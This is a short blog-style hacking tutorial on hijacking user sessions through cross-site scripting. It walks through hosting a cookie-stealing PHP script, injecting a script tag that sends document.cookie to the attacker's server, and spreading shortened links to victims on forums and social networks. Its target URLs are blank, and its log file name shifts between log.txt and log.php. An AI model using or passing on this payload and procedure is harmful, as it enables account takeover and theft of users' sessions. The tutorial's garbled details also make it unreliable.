Cross site scripting which is commonly known as XSS, is a very simple vulnerability found in Web Applications, XSS allows the attacker to RUN a malicious code on the website. XSS vulnerability allows attacker to inject some code into the web apps affected in order to bypass security access to the website or to trap the user’s info and cookie stealing. This technique can be used for many purposes like cookie stealing, website hacking, user’s manipulation and many more things attacker can play with it. Here I will show you how to hack with XSS, if you want to learn more about it, you can check this complete guide to XSS cross site scripting or how to hack with XSS. XSS is very much handful when it comes to session hijacking. So, here I am going to share how to hijack cookies using xss.

So, how to hijack cookies using XSS? Session Hijacking

It’s very simple to hijack cookies using XSS.


There’s not a huge list of required things to hijack cookies using XSS. You just need these following things.

  • Hosting Panel ( You can use free hosting provider like or you can use your premium hosting).
  • XSS Vulnerable Website
  • Victim

Steps to follow

  • Create an account on any hosting provider. No matter whether you buy it or use a free one.
  • Download the CookieStealer.php script that snatches the cookies of the victim.
  • Create another notepad file named as log.txt but make sure it’s empty and you do not write anything in it. This will be used to save the cookies of the victims.
  • Upload both files to the hosting server by using file manager or by FTP.
  • Uploaded..? Ok we’re good to go now. Now copy the URL of CookieStealer.php like below.
  • Next find out a XSS vulnerable website and run the following script. If you don’t know how to find xss vulnerability, you can learn how to hack with XSS here. Make sure, you change the to your own hosting website name and to xss vulnerable site.

<script language= “JavaScript”>document.location=”” + document.cookie;document.location=””</script>

  • You can also spread into different platforms like forums and other social networks by shortening the URL. As soon someone will open it up, their cookies will be saved into log.php file.


That’s all. Hope it made you clear how to session hijacking is done using XSS.

Note: Use Virtual Machine and scan on VirusTotal before downloading any program on Host Machine for your privacy.